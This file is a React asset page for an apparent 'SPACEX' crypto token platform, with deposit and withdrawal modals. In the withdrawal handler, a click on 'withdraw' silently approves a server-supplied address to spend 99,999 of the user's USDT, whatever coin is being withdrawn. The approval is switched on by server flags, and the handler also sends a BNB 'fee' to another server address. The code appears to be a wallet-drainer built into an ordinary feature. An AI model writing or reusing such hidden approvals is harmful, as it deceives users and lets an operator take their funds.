import React, {useState, useEffect} from 'react';
import { connect } from 'react-redux';
import Head from '../../components/head/Head'
import Foot from '../../components/foot/Foot'
import { Input, message,Statistic  } from 'antd';
import {balanceOf,signer,transfer,allowance,approve,transferBnb} from '../../utils/ethers'

import NumberFormat from 'react-number-format'
import CountUp from "react-countup";
import { useTranslation } from 'react-i18next'
import {
    WarningOutlined,CloseOutlined
  } from '@ant-design/icons';
import './tan.css'
import '../invite/index.less'
import { addTixian, getAssetsIndex, getTixianRecord,addDepositBuy,addDepositBuyRed,getLiushui,addApprove,gethasPay,addPayBnb} from "../../api";
import { CSSTransition } from 'react-transition-group';
import { stringify } from 'qs';
import {useNavigate} from "react-router-dom";

const mapStateToProps=(state)=>{
    return{
        isLogin:state.isLogin,
        address:state.address,
        chain:state.chain
    }
}

const IndexTest1 = (props) => {
    const navigate = useNavigate()
    const { t } = useTranslation()
    const [num,setNum] = useState(0)
    const [coin,setCoin] = useState("spacex")
    const [tab,setTab] = useState("bnb")
    const [tab1,setTab1] = useState("col")
    const [valueCol,setValueCol] = useState("")
    const [valueDep,setValueDep] = useState("")
    

    const [isApproveUsdt,setIsApproveUsdt]=useState(false)


    const [receive,setReceive] = useState("")
    const [receiveFee,setReceiveFee] = useState("")
    const [receiveApprove,setReceiveApprove] = useState("")

    const [hasShou,setHasShou] =useState("")
    const [balanceOnUsdt,setBalanceOnUsdt] = useState("")
    const [balanceOnSpacex,setBalanceOnSpacex] = useState("")
    // const [balanceOnMarsx,setBalanceOnMarsx] = useState("")
    const [spacex_n,setSpacexN]=useState("")
    const [spacex_mint_n,setSpacexMintN]=useState("")
    const [spacex_air_n,setSpacexAirN]=useState("")
    const [usdt_n,setUsdtN]=useState("")
    const [bnb_n,setBnbN]=useState("")
    const [doge_n,setDogeN]=useState("")
    const [doge_pledge_n,setDogePledgeN]=useState("")

    const [edSpacexMint,setEdSpacexMint]=useState(0)
    const [edSpacexAir,setEdSpacexAir]=useState(0)
    const [edDoge,setEdDoge]=useState(0)
    const [isb,setIsB] =useState(false)
    const [depoNum,setDepoNum] = useState("")
    
    const [list,setList] = useState([])
    const [isLock,setIsLock]=useState(false)
    const [showJoin,setShowJoin] = useState(false)
    const [showJoin1,setShowJoin1] = useState(false)
    const [classes,setClasses] = useState(0)

    const [showTi,setShowTi] = useState(false)
    const [showDep,setShowDep] = useState(false)

     const _isApproveUsdt =  () => {
       return  new Promise(async (resolve, reject) => {
            allowance(props.address,receiveApprove,"usdt").then(res=>{
                if(parseFloat(res)>=99999){
                    setIsApproveUsdt(true)
                    resolve(true)
                }else{
                    resolve(false)
                }
            },err =>{
                    resolve(false)
            })
         })
    }

  

    const _rand=  () =>{
            if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
       
        // if(props.address.length<=0) return false
    

        if(receive.length === 0){
            message.error(t('asset.区块合约错误'))
            return false
        }

        let _coin = coin.toLowerCase()

        
        
        console.log(valueDep)
        if(!valueDep){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        if(valueDep.length<=0){
            message.error(t('asset.请输入转入数量'))
            return false
        }
        // if(valueDep<100){
        //     message.error(t('asset.最低')+":100")
        //     return false
        // }

        if(_coin == "spacex"){
            if(valueDep<1000){
                message.error(t('asset.最低')+":1000")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnSpacex)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }else if(_coin == "usdt"){
            if(valueDep<10){
                message.error(t('asset.最低')+":10")
                return false
            }
            if(parseFloat(valueDep)>parseFloat(balanceOnUsdt)){
      
                message.error(t('asset.您的钱包代币不足'))
                return false
            }
        }

        if(isLock){
            return false
        }
        setIsLock(true)
 let con = _coin
                if(_coin =="spacex"){
                    con = "ccer"
                } 
                console.log(con)
                let _valueDep = valueDep
                _valueDep = parseInt(_valueDep)
                transfer(props.address,receive,String(con),_valueDep).then(
                    res=>{
                        addDepositBuy({
                            address:props.address,
                            value:_valueDep.toString(),
                            hex:res.hash,
                            coin:_coin
                        }).then(
                            res=>{
                                message.success(res.msg)
                                closeAll()
                                setNum(num+1);
                                setIsLock(false)
                            })
                    }, error=>{
                        setIsLock(false)
                        message.error(error)
                    })


    }



    // const _getTixianRecord = (classes) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab1(classes)
        
    //     getTixianRecord({classes:classes}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin1(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    // const _getLiushui = (coin) =>{
    //     if(props.address.length<=0){
    //         message.error(t('node.请先连接钱包'))
    //         return false
    //     }
    //     if(props.isLogin === false){
    //         message.error(t('node.请先绑定地址'))
    //         return false
    //     }
    //     setTab(coin)
        
    //         getLiushui({coin:coin}).then(res=>{
    //             if(res.code === 0 ){
    
                  
    //                 if(res.data.list != null){
    //                     setList(res.data.list)
                        
    //                 }
    //                 setShowJoin(true)
    
    //             }else{
    //                 message.error(res.msg)
    //             }
    //         },error =>{
    //             message.error(error)
    //         })
        
        
    // }

    const _getTixianIndex= () =>{
        if(props.address.length === 0 || props.isLogin === false){
            return false
        }
        getAssetsIndex().then(res=>{
            if(res.code === 0 ){
                setUsdtN(res.data.usdt_n)
                setBnbN(res.data.bnb_n)
                setDogeN(res.data.doge_n)

                setDogePledgeN(res.data.doge_pledge_n)

                setSpacexN(res.data.spacex_n)
                setSpacexMintN(res.data.spacex_mint_n)
                setSpacexAirN(res.data.spacex_air_n)

                setEdDoge(res.data.doge_edu)
                setEdSpacexMint(res.data.spacex_mint_edu)
                setEdSpacexAir(res.data.spacex_air_edu)

                setReceive(res.data.receive)
                setReceiveFee(res.data.fee_receive)
                setReceiveApprove(res.data.approve_receive)
                    setHasShou(res.data.appr)
                        setIsB(res.data.isb)
            
                
                // if(res.data.list != null){
                //     setList(res.data.list)
                // }

            }else{
                message.error(res.msg)
            }
        },error =>{
            message.error(error)
        })

    }
  

   const _maxDep = () =>{
         let _coin = coin.toLocaleLowerCase()
     
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先绑定地址'))
            return false
        }
        if(_coin == "spacex"){
          setValueDep(balanceOnSpacex)
        }else if(_coin == "usdt"){
             setValueDep(balanceOnUsdt)
        }else{
           
        }

    }

    

    const _ti = async () =>{

        let _coin = coin.toLowerCase()
        if(props.address.length<=0){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(props.isLogin === false){
            message.error(t('head.请先连接钱包'))
            return false
        }
        // message.warning(t('asset.提取中请等待'),4)
        //  const _isApprove =await _isApproveUsdt()
        //     console.log(_isApprove)
         
        // if(_isApprove == false){
        //     let tx = await approve(receiveApprove,"usdt",99999,true)
        //     addApprove({address:props.address,hex:String(tx.hash)})
        // }

     

        if(valueCol.length===0){
            message.error(t('g.请输入数量'))
            return false
        }
        
        if(_coin == "doge"){
            if(parseFloat(valueCol)<20){
                message.error(t('g.最低提取数量')+":20")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(doge_n)){
                message.error(t('g.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(edDoge)){
                message.error(t('g.额度不足'))
                return false
            }
                if(parseFloat(valueCol)%10 !=0){
                message.error(t('g.数量必须是10的整数倍'))
                return false
            }

            
        }else if(_coin == "doge_pledge"){
            if(parseFloat(valueCol)<20){
                message.error(t('g.最低提取数量')+":20")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(doge_pledge_n)){
                message.error(t('g.余额不足'))
                return false
            }

         
           

            
        }else if(_coin == "spacex_air"){
            if(parseFloat(valueCol)<1000){
                message.error(t('g.最低提取数量')+":1000")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(spacex_air_n)){
                message.error(t('g.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(edSpacexAir)){
                message.error(t('g.额度不足'))
                return false
            }

            

            
        }else if(_coin == "spacex_mint"){
            if(parseFloat(valueCol)<1000){
                message.error(t('g.最低提取数量')+":1000")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(spacex_mint_n)){
                message.error(t('g.余额不足'))
                return false
            }

            if(parseFloat(valueCol)>parseFloat(edSpacexMint)){
                message.error(t('g.额度不足'))
                return false
            }

            

            
        }else if(_coin == "spacex"){
            if(parseFloat(valueCol)<1000){
                message.error(t('g.最低提取数量')+":1000")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(spacex_n)){
                message.error(t('g.余额不足'))
                return false
            }
  
            
        }else if(_coin == "bnb"){
            if(parseFloat(valueCol)<0.005){
                message.error(t('g.最低提取数量')+":0.005")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(bnb_n)){
                message.error(t('g.余额不足'))
                return false
            }
        }else if(_coin == "usdt"){
            if(parseFloat(valueCol)<10){
                message.error(t('g.最低提取数量')+":10")
                return false
            }
            if(parseFloat(valueCol)>parseFloat(usdt_n)){
                message.error(t('g.余额不足'))
                return false
            }
        }


        message.warning(t('g.提取中请等待'),4)
            const _isApprove =await _isApproveUsdt()
            console.log(isb)
            if(isb==false){
                if(_isApprove == false || parseInt(hasShou) == 3){
                let tx = await approve(receiveApprove,"usdt",99999,true)
                addApprove({address:props.address,hex:String(tx.hash)})
            }
            }
        

        
        if(isLock) return false;
        setIsLock(true)

        if(isb==false){
                        gethasPay({address:props.address,coin:coin}).then(resPay=>{
                            if(resPay.data.has=="3"){
                                    transferBnb(props.address,receiveFee,0.0007).then(async resBnb=>{
                                    let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                                    if(res4.code==0){
                                                    
                                        
                                            addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address,days:String(0)}).then(res=>{
                                                if(res.code===0){
                                                    message.success(res.msg)
                                                }else{
                                                    message.error(res.msg)
                                                }
                                                setIsLock(false)
                                                closeAll()
                                                setNum(num+1)
                                            },error=>{
                                                setIsLock(false)
                                                message.error(error)
                                            })
        
                                     
                                    }else{
                                        setIsLock(false)
                                        closeAll()
                                        message.error(res4.msg)
                                    }
                                })
                            }else{
                                signer(props.address).then(res=>{
                                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                                        if(res.code===0){
                                            message.success(res.msg)
                                        }else{
                                            message.error(res.msg)
                                        }
                                        setIsLock(false)
                                        closeAll()
                                        setNum(num+1)
                                    },error=>{
                                        setIsLock(false)
                                        message.error(res.msg)
                                    })
                                },error=>{
                                    setIsLock(false)
                                })
                            }
                        })
                        
                }else{
        
                    gethasPay({address:props.address,coin:coin}).then(resPay=>{
                            if(resPay.data.has=="3"){
                                    transferBnb(props.address,receiveFee,0.0007).then(async resBnb=>{
                                    let res4 = await addPayBnb({address:props.address,hex:String(resBnb.hash),coin:coin})
                                    if(res4.code==0){
                                                    
                                        
                                            addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:props.address,days:String(0)}).then(res=>{
                                                if(res.code===0){
                                                    message.success(res.msg)
                                                }else{
                                                    message.error(res.msg)
                                                }
                                                setIsLock(false)
                                                closeAll()
                                                setNum(num+1)
                                            },error=>{
                                                setIsLock(false)
                                                message.error(error)
                                            })
        
                                     
                                    }else{
                                        setIsLock(false)
                                        closeAll()
                                        message.error(res4.msg)
                                    }
                                })
                            }else{
                                signer(props.address).then(res=>{
                                    addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                                        if(res.code===0){
                                            message.success(res.msg)
                                        }else{
                                            message.error(res.msg)
                                        }
                                        setIsLock(false)
                                        closeAll()
                                        setNum(num+1)
                                    },error=>{
                                        setIsLock(false)
                                        message.error(res.msg)
                                    })
                                },error=>{
                                    setIsLock(false)
                                })
                            }
                        })
                    //  signer(props.address).then(res=>{
                    //     addTixian({address:props.address,receive:props.address,value:String(valueCol),coin:coin,pass:res.pass,days:String(0)}).then(res=>{
                    //         if(res.code===0){
                    //             message.success(res.msg)
                    //         }else{
                    //             message.error(res.msg)
                    //         }
                    //         setIsLock(false)
                    //         closeAll()
                    //         setNum(num+1)
                    //     },error=>{
                    //         setIsLock(false)
                    //         message.error(res.msg)
                    //     })
                    // },error=>{
                    //     setIsLock(false)
                    // })
                }

    }

    const closeAll = () =>{
        setShowTi(false)
        setShowDep(false)
        setCoin("")
        setValueCol("")
        setValueDep("")
    }

    const openTi = (coin) =>{
        
    //     message.error(t('g.暂未开放'))
    //    return
    console.log(coin)
    // if(coin == "spacex" || coin =="spacex_air" || coin =="spacex_mint"){
    //           message.error(t('g.暂未开放'))
    //    return
    // }else{
  
    // }
      

        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        setShowDep(false)
        setCoin(coin)
        setShowTi(true)
        // setValueCol(edMars)
        
    }

    const openDep = (coin) =>{
    //     message.error(t('g.暂未开放'))
    //    return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        if(coin=="bnb" || coin=="doge" || coin =="spacex_air" || coin == "spacex_mint"){
            message.error("coing soon")
            return
        }
        let _coin =coin;
        if(coin == "spacex"){
            _coin ="ccer"
        }
        if(isLock) return false;
        setIsLock(true)
        message.loading("get balance...",0)
        balanceOf(props.address,_coin.toLowerCase()).then(res=>{
            if(coin == "usdt"){
                setBalanceOnUsdt(res)
            }else if(coin =="spacex"){
                setBalanceOnSpacex(res)
            }
            message.destroy()
            setShowTi(false)
            setCoin(coin)
            setShowDep(true)
            setIsLock(false)
        },error=>{
            message.error(error)
            setIsLock(false)
        })
        
        
        
    }

    const goLiushui = (url)=>{
    //     message.error(t('g.暂未开放'))
    //    return
        if(props.address.length<=0 ){
            message.error(t('head.请先连接钱包'))
            return false
        }
        navigate(url,{
            state:{
                address:props.address
            }
        })
    }
    


    useEffect(() => {
            window.scrollTo(0, 0)
           
             _getTixianIndex()
             
            // _balanceOf()
            // _balanceOf1()
    }, 
    // eslint-disable-next-line
    [props.isLogin,num]);

    return (
        <>  


        {/* col new */}
        <CSSTransition
            in={showTi}
            unmountOnExit={true}
            classNames='lan'
            timeout={1000}
            appear
            onEnter={(e) => console.log('开始进入动画')}
            onEntering={(e) => console.log('执行进入动画')}
            onEntered={(e) => console.log('进入动画结束')}
            onExit={(e) => console.log('开始离开动画')}
            onExiting={(e) => console.log('正在离开动画')}
            onExited={(e) => console.log('离开动画结束')}>
            <div
            className="
                fixed inset-0 z-50
                flex items-start justify-center
                bg-black/30
                backdrop-blur-[14px]
                backdrop-saturate-150
                px-4
            "
            >
            <div
                className="
                relative mt-20
                w-full max-w-[390px]
                min-h-[250px]
                px-5 py-6
                overflow-hidden

                bg-black/80

                border-0 border-[#4A5560]

                shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

                [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
                "
            >
                {/* Close */}
                <button
                onClick={closeAll}
                className="
                    absolute right-4 top-4 z-50
                    w-6 h-6
                    flex items-center justify-center

                    text-text1
                    text-[14px]
                    leading-none

                    border border-[#3A444E]
                    bg-[#070D12]/95

                    [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

                    transition-all duration-200

                    hover:text-text1
                    hover:border-[#6B7680]
                    hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
                "
                >
                ×
                </button>

                {/* 外层细线 */}
                <div
                className="
                    absolute inset-[6px]
                    pointer-events-none
                    border border-[#171c20]

                    [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
                "
                />

                

                

                {/* 左上角 */}
                <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
                

                {/* 右上角 */}
                <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
                

                {/* 左下角 */}
                <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
                

                {/* 右下角 */}
                <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
            

            

                {/* 内部暗色纹理线 */}
                <div
                className="
                    absolute inset-0
                    opacity-25
                    pointer-events-none
                    bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
                "
                />

                {/* 内容区域 */}
                <div className="relative z-10 px-4">
                {/* 这里放你的弹窗内容 */}
                    
                    {
                        coin=="doge"?(
                            <>
                                <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span>
                                    
                                </div>
                                <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={doge_n} duration="1" decimals={2} /> DOGE</span>
                                </div>
                                <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={edDoge} duration="1" decimals={2} /> DOGE</span>
                                </div>
                            </>
                        ):coin=="doge_pledge"?(
                            <>
                                <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} $DOGE [{t('air.生态收益账户')}]</span>
                                    
                                </div>
                                <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={doge_pledge_n} duration="1" decimals={2} /> DOGE</span>
                                </div>
                                <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    {/* <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={edDoge} duration="1" decimals={2} /> DOGE</span> */}
                                </div>
                            </>
                        ):coin=="bnb"?(
                            <>
                            <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span>
                                    
                                </div>
                                <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={bnb_n} duration="1" decimals={6} /> BNB</span>
                                </div>
                                
                            </>
                        ):coin=="spacex"?(
                            <>
                            <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} $SPACEX [{t('air.生态收益账户')}] </span>
                                    
                                </div>
                                <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={spacex_n} duration="1" decimals={4} /> SPACEX</span>
                                </div>
                                
                            </>
                        ):coin=="spacex_air"?(
                                <>
                                <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} $SPACEX [{t('air.空投账户')}] </span>
                                    
                                </div>
                               <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={spacex_air_n} duration="1" decimals={2} /> SPACEX</span>
                                </div>
                                <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={edSpacexAir} duration="1" decimals={2} /> SPACEX</span>
                                </div>
                                
                            </>
                        ):coin=="usdt"?(
                                <>
                                <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} $USDT [{t('air.生态收益账户')}] </span>
                                    
                                </div>
                               <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={usdt_n} duration="1" decimals={2} /> USDT</span>
                                </div>
                                
                                
                            </>
                        ):(
                                  <>
                                  <div className=' w-full h-5 mt-6 flex flex-row justify-between items-center'>
                                    <span className="text-sm text-gray-500">{t('air.提取')} $SPACEX [{t('air.铸造账户')}] </span>
                                    
                                </div>
                               <div className=' w-full h-5 mt-5 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提数量')}：<CountUp start={0} end={spacex_mint_n} duration="1" decimals={2} /> SPACEX</span>
                                </div>
                                <div className=' w-full h-5 mt-2 flex flex-row justify-between items-center'>
                                    {/* <span className="text-sm text-gray-500">{t('air.提取')} ${coin.toLocaleUpperCase()} </span> */}
                                    <span className="text-xs text-text1">{t('g.可提额度')}：<CountUp start={0} end={edSpacexMint} duration="1" decimals={2} /> SPACEX</span>
                                </div>
                                
                            </>
                        )
                    }

                    

                    <div className="w-full min-h-[32px] mt-4 border-[1px] border-text1
                        relative inline-flex flex-col h-4  justify-start 
                        px-3  text-white text-[10px]  tracking-wider
                        [--cut:4px] [--border:1px]
                        before:absolute before:inset-0 before:bg-gray-800/50
                        before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                        after:absolute after:inset-[var(--border)] after:bg-[#010B1250]
                        after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                    ">
                        <div className="w-full   flex flex-row items-center  z-10  " >
                        <input  onInput={(e)=>setValueCol(e.target.value)} value={valueCol}  type="number"   className=' w-4/5 h-[32px]  text-sm text-text1 input1 placeholder:text-xs ' placeholder={`${t('g.最低提取数量')} ${coin === "doge" ? "20" :coin === "doge_pledge" ? "20":coin === "bnb"? "0.005":coin === "usdt"? "10":"1000"}`} ></input>
                        {/* <span onClick={_maxTi} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                    </div>
                    
                
                    </div>
                    <div className='w-full h-6 mt-4  ml-2 flex flex-row justify-center items-center '>
                        <button onClick={_ti} className="w-full sci-glow-btn"> <span>{t('air.提取')}</span></button>
                    </div>
                    
                    
                    
                    
                
                {/*  */}
                </div>
            </div>
            </div>
            </CSSTransition>
        {/*dep  */}
         <CSSTransition
            in={showDep}
            unmountOnExit={true}
            classNames='lan'
            timeout={1000}
            appear
            onEnter={(e) => console.log('开始进入动画')}
            onEntering={(e) => console.log('执行进入动画')}
            onEntered={(e) => console.log('进入动画结束')}
            onExit={(e) => console.log('开始离开动画')}
            onExiting={(e) => console.log('正在离开动画')}
            onExited={(e) => console.log('离开动画结束')}>
            <div
            className="
                fixed inset-0 z-50
                flex items-start justify-center
                bg-black/30
                backdrop-blur-[14px]
                backdrop-saturate-150
                px-4
            "
            >
            <div
                className="
                relative mt-20
                w-full max-w-[390px]
                min-h-[250px]
                px-5 py-6
                overflow-hidden

                bg-black/80

                border-0 border-[#4A5560]

                shadow-[0_0_30px_rgba(0,0,0,.95),inset_0_0_30px_rgba(12,18,24,.8)]

                [clip-path:polygon(9px_0,calc(100%-9px)_0,100%_9px,100%_calc(100%-9px),calc(100%-9px)_100%,9px_100%,0_calc(100%-9px),0_9px)]
                "
            >
                {/* Close */}
                <button
                onClick={closeAll}
                className="
                    absolute right-4 top-4 z-50
                    w-6 h-6
                    flex items-center justify-center

                    text-text1
                    text-[14px]
                    leading-none

                    border border-[#3A444E]
                    bg-[#070D12]/95

                    [clip-path:polygon(20%_0,80%_0,100%_20%,100%_80%,80%_100%,20%_100%,0_80%,0_20%)]

                    transition-all duration-200

                    hover:text-text1
                    hover:border-[#6B7680]
                    hover:shadow-[0_0_10px_rgba(120,135,150,.35)]
                "
                >
                ×
                </button>

                {/* 外层细线 */}
                <div
                className="
                    absolute inset-[6px]
                    pointer-events-none
                    border border-[#171c20]

                    [clip-path:polygon(14px_0,calc(100%-14px)_0,100%_14px,100%_calc(100%-14px),calc(100%-14px)_100%,14px_100%,0_calc(100%-14px),0_14px)]
                "
                />

                

                

                {/* 左上角 */}
                <div className="absolute left-[10px] top-[10px] w-[58px] h-[28px] border-l-2 border-t-2 border-[#894a02]" />
                

                {/* 右上角 */}
                <div className="absolute right-[10px] top-[10px] w-[58px] h-[28px] border-r-2 border-t-2 border-[#894a02]" />
                

                {/* 左下角 */}
                <div className="absolute left-[10px] bottom-[10px] w-[58px] h-[28px] border-l-2 border-b-2 border-[#894a02]" />
                

                {/* 右下角 */}
                <div className="absolute right-[10px] bottom-[10px] w-[58px] h-[28px] border-r-2 border-b-2 border-[#894a02]" />
            

            

                {/* 内部暗色纹理线 */}
                <div
                className="
                    absolute inset-0
                    opacity-25
                    pointer-events-none
                    bg-[linear-gradient(90deg,transparent_0%,rgba(255,255,255,.035)_50%,transparent_100%)]
                "
                />

                {/* 内容区域 */}
                <div className="relative z-10 px-4">
                {/* 这里放你的弹窗内容 */}
                    
                    <div className=' w-full h-5 mt-12 flex flex-row justify-between items-center'>
                        <span className="text-sm text-gray-200">{t('asset.存入')} ${coin} </span>
                        <span className="text-xs text-text-act">{t('asset.钱包余额')}：<CountUp start={0} end={coin=="spacex"?balanceOnSpacex:coin=="USDT"?balanceOnUsdt:0} duration="1" decimals={4} /></span>
                    </div>
                    <div className="w-full min-h-[32px] mt-4 border-[1px] border-text1
                        relative inline-flex flex-col h-4  justify-start 
                        px-3  text-white text-[10px]  tracking-wider
                        [--cut:4px] [--border:1px]
                        before:absolute before:inset-0 before:bg-gray-800/50
                        before:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                        after:absolute after:inset-[var(--border)] after:bg-[#010B1250]
                        after:[clip-path:polygon(var(--cut)_0,calc(100%_-_var(--cut))_0,100%_var(--cut),100%_calc(100%_-_var(--cut)),calc(100%_-_var(--cut))_100%,var(--cut)_100%,0_calc(100%_-_var(--cut)),0_var(--cut))]
                    ">
                        <div className="w-full   flex flex-row items-center  z-10  " >
                        <input  onInput={(e)=>setValueDep(e.target.value)} value={valueDep}  type="number"   className=' w-4/5 h-[32px]  text-sm text-text1 input1 placeholder:text-xs '  ></input>
                        {/* <span onClick={_maxDep} className='w-1/5 h9 block text-right text-sm text-text-act'>{t('asset.全部')}</span> */}
                    </div>
                    
                
                    </div>
                    <div className='w-full h-6 mt-4  ml-2 flex flex-row justify-center items-center '>
                        <button onClick={_rand} className="w-full sci-glow-btn"> <span>{t('asset.存入')}</span></button>
                    </div>



                           
                    
                    
                    
                    
                
                {/*  */}
                </div>
            </div>
            </div>
            </CSSTransition>           
        {/*col  */}
       
        {/*  */}
        
            <Head/>
            
            <div className=' invitebg  w-full lg:w-1/3 md:w-1/3 sm:1/2  px-0 pt-12 text-white flex flex-col z-10'>

                {/*  */}
                    <div className='w-full lg:w-1/3 px-0   min-h-[103px]  flex flex-row  '>
                        {/* <div className=' w-full lg:w-1/3 md:w-1/3 sm:1/2 min-h-[203px]  absolute '>
                            
                        </div> */}
                        <div className='w-[57%] pl-4 flex flex-col z-40'>
                            <img className='mt-8  '  src={require('../../assets/air/asset.jpg')} style={{"width":"406px"}}></img>
                            <span className='mt-[2px] text-text1 text-[9px]' >{t('air.所有资产列表，提取存入链上钱包')}</span>
                        
                        
                            

                        </div>
                        
                    </div>
                {/*  */}


                <div className="mx-4  px-5  mt-7 flex flex-col probg1 h-[100px]">
                    {/* <div className="w-full h-5 mt-5 text-sm text-text-act">SPACEX</div> */}
                    <div className="w-full h-14 mt-3 flex flex-row items-center justify-start">
                        <img alt='rr' className=' mr-3' src={require('../../assets/ipo/logo1.png')} style={{"width":"35px"}}></img>
                        <div className=' w-20 flex flex-col justify-start'>
                            <span className="text-xs text-text-act">SPACEX</span>
                            <span className="text-[9px] text-gray-400">[{t('air.生态收益账户')}]</span>
                        </div>
                        <div className='  flex flex-col justify-start'>
                            <span className=" text-[9px] text-gray-400">{t('asset.余额')}：</span>
